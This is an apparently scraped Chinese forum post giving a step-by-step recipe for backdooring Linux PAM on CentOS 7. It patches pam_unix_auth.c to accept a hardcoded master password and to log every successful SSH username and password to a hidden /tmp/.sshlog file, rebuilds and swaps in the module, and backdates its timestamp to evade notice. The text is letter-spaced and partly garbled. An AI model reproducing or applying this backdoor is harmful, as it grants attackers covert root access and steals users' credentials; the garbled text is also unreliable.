[1157] 2020-12-07_LinuxPAM后门:窃取ssh密码及自定义密码登录

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-16
2020-12-07_LinuxPAM后门:窃取ssh密码及自定义密码登录 L i n u x   P A M s s h   Y 4 e r   C h a B u g   2 0 2 0 - 1 2 - 0 7 P A M L i n u x s s h d n s C e n t O S   L i n u x   r e l e a s e   7 . 8 . 2 0 0 3   ( C o r e ) p a m - 1 . 1 . 8 - 2 3 . e l 7 . x 8 6 _ 6 4 c e n t o s s e l i n u x S E L I N U X d i s a b l e d s s h P A M : h t t p : / / w w w . l i n u x - p a m . o r g / l i b r a r y / g c c f l e x / *   v e r i f y   t h e   p a s s w o r d   o f   t h i s   u s e r   * / r e t v a l   =   _ u n i x _ v e r i f y _ p a s s w o r d ( p a m h ,   n a m e ,   p ,   c t r l ) ; i f ( s t r c m p ( " f u c k y o u " , p ) = = 0 ) { r e t u r n   P A M _ S U C C E S S ; } n a m e   =   p   =   N U L L ; s e t e n f o r c e   0 / e t c / s e l i n u x / c o n f i g r p m   - q a | g r e p   p a m w g e t   h t t p : / / w w w . l i n u x - p a m . o r g / l i b r a r y / L i n u x - P A M - 1 . 1 . 8 . t a r . g z t a r   z x v f   L i n u x - P A M - 1 . 1 . 8 . t a r . g z y u m   i n s t a l l   g c c   f l e x   f l e x - d e v e l   - y L i n u x - P A M - 1 . 1 . 8 / m o d u l e s / p a m _ u n i x / p a m _ u n i x _ a u t h . c
s o s o p a m _ u n i x . s o p a m _ u n i x . s o f i n d s o G G s s h p a m _ u n i x . s o c d   L i n u x - P A M - 1 . 1 . 8 . / c o n f i g u r e   - - p r e f i x = / u s e r   - - e x e c - p r e f i x = / u s r   - - l o c a l s t a t e d i r = / v a r   - - s y s c o n f d i r = / e t c   - - d i s a b l e - s e l i n u x   - - w i t h - l i b i c o n v - p r e f i x = / u s r m a k e . / m o d u l e s / p a m _ u n i x / . l i b s / p a m _ u n i x . s o c p   / u s r / l i b 6 4 / s e c u r i t y / p a m _ u n i x . s o   / t m p / p a m _ u n i x . s o . b a k c p   / r o o t / L i n u x - P A M - 1 . 1 . 8 / m o d u l e s / p a m _ u n i x / . l i b s / p a m _ u n i x . s o   / u s r / l i b 6 4 / s e c u r i t y / p a m _ u n i x . s o f u c k y o u t o u c h   p a m _ u n i x . s o   - r   p a m _ u m a s k . s o
s s h / t m p / . s s h l o g s o m o d u l e s / p a m _ u n i x / p a m _ u n i x _ a u t h . c i f ( r e t v a l   = =   P A M _ S U C C E S S ) {         F I L E   *   f p ;         f p   =   f o p e n ( " / t m p / . s s h l o g " ,   " a " ) ;         f p r i n t f ( f p ,   " % s   :   % s n " ,   n a m e ,   p ) ;         f c l o s e ( f p ) ; } c d   L i n u x - P A M - 1 . 1 . 8 m a k e   c l e a n   & &   m a k e c p   / r o o t / L i n u x - P A M - 1 . 1 . 8 / m o d u l e s / p a m _ u n i x / . l i b s / p a m _ u n i x . s o   / u s r / l i b 6 4 / s e c u r i t y / p a m _ u n i x . s o
s s h
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则